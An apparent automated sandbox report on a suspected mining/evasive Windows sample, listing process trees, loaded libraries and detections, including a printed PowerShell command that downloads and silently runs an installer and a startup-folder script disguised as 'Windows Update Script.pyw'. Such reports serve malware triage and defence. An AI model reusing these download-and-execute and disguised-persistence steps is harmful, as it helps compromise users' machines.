Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004A408523_2_004A4085
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AC13223_2_004AC132
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004BF2A223_2_004BF2A2
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B02B623_2_004B02B6
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_0048635B23_2_0048635B
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B057123_2_004B0571
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004BA60023_2_004BA600
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B26D123_2_004B26D1
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004B290523_2_004B2905
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AF9D323_2_004AF9D3
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004BAA9823_2_004BAA98
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004BDC1E23_2_004BDC1E
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004BDD4223_2_004BDD42
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AFD4523_2_004AFD45
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004AFFEF23_2_004AFFEF
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: String function: 0048204D appears 54 times
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: String function: 004C3770 appears 81 times
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: String function: 004C0B3E appears 34 times
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: String function: 004838F5 appears 502 times
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: String function: 004C0657 appears 682 times
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: String function: 00007FF7262925F0 appears 50 times
Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.21.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.21.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.0.drStatic PE information: No import functions for PE file found
Source: 3Af7PybsUi.exe, 00000000.00000003.1316082858.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1318888772.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1316209124.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1318706671.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1318116340.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1319083216.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1316649927.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1317878527.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1315602967.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32ui.pyd0 vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1315925117.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1317192241.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1316822581.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1318007951.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1316346546.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000002.2235597551.000002643EF82000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32trace.pyd0 vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000000.00000003.1318595498.000002643EF75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs 3Af7PybsUi.exe
Source: 3Af7PybsUi.exe, 00000003.00000003.1867535538.000001EC85AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~LegalCopyrightCopyright (c) Python Software Foundation. All rights reserved.X0OriginalFilenamepython-3.11.0-amd64.exeP.ProductNamePython 3.11.0 (64-bit)< vs 3Af7PybsUi.exe
Source: classification engineClassification label: mal72.evad.mine.winEXE@38/1236@1/2
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262929E0 GetLastError,FormatMessageW,MessageBoxW,0_2_00007FF7262929E0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00484674 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,23_2_00484674
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004C34D0 GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,23_2_004C34D0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_004A6A02 ChangeServiceConfigW,GetLastError,23_2_004A6A02
Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Python311
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update Script.pywJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6384:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:60:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile created: C:\Users\user~1\AppData\Local\Temp\_MEI65002Jump to behavior
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: cabinet.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: msi.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: version.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: wininet.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: comres.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: clbcatq.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: msasn1.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: crypt32.dll23_2_00481070
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCommand line argument: feclient.dll23_2_00481070
Source: 3Af7PybsUi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\3Af7PybsUi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 3Af7PybsUi.exeReversingLabs: Detection: 25%
Source: 3Af7PybsUi.exeVirustotal: Detection: 35%
Source: python-3.11.0-amd64.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\3Af7PybsUi.exeFile read: C:\Users\user\Desktop\3Af7PybsUi.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\3Af7PybsUi.exe "C:\Users\user\Desktop\3Af7PybsUi.exe"
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Users\user\Desktop\3Af7PybsUi.exe "C:\Users\user\Desktop\3Af7PybsUi.exe"
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exe "C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe "C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe" -burn.clean.room="C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe "C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{5461B88A-4125-4C2C-9E7F-F7CAF41CDAA7} {4FB5F196-D94A-42FD-9D71-D58BBB67B36C} 2908
Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknownProcess created: C:\Windows\System32\SrTasks.exe C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:1
Source: C:\Windows\System32\SrTasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: unknownProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /burn.runonce
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: unknownProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /burn.runonce
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{BD19B2EA-732D-48C1-8A08-BF4B0C3D44E6} {64FC04EF-7BFE-4576-8BE3-AE2D5EB04A17} 6048
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{7A5BF652-324E-428D-970C-4BE0E2804237} {336D69AC-00AC-4720-B9AA-68DF04B70AEA} 5768
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\SrTasks.exe C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
Source: C:\Windows\System32\SrTasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\SrTasks.exe C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
Source: C:\Windows\System32\SrTasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BDC2FAFBEB7EA3DA80C7B8E1870EE09C
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Python311\python.exe "C:\Program Files\Python311\python.exe" -E -s -m ensurepip -U --default-pip
Source: C:\Program Files\Python311\python.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Users\user\Desktop\3Af7PybsUi.exe "C:\Users\user\Desktop\3Af7PybsUi.exe"Jump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filePath = \"C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe\" Invoke-WebRequest -Uri $url -OutFile $filePath "Jump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exe "C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" /quiet InstallAllUsers=1 PrependPath=1 Include_test=0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe "C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe" -burn.clean.room="C:\Users\user~1\AppData\Local\Temp\tmpaf99aaqq.exe" -burn.filehandle.attached=640 -burn.filehandle.self=680 /quiet InstallAllUsers=1 PrependPath=1 Include_test=0Jump to behavior
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeProcess created: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe "C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe" -q -burn.elevated BurnPipe.{5461B88A-4125-4C2C-9E7F-F7CAF41CDAA7} {4FB5F196-D94A-42FD-9D71-D58BBB67B36C} 2908Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BDC2FAFBEB7EA3DA80C7B8E1870EE09C
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeProcess created: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe "C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe" -burn.filehandle.attached=552 -burn.filehandle.self=548 /quiet /burn.log.append "C:\Users\user~1\AppData\Local\Temp\Python 3.11.0 (64-bit)_20241014030941.log" InstallAllUsers=1 PrependPath=1 Include_test=0
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Python311\python.exe "C:\Program Files\Python311\python.exe" -E -s -m ensurepip -U --default-pip
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: libffi-8.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: libcrypto-3.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: libssl-3.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\3Af7PybsUi.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
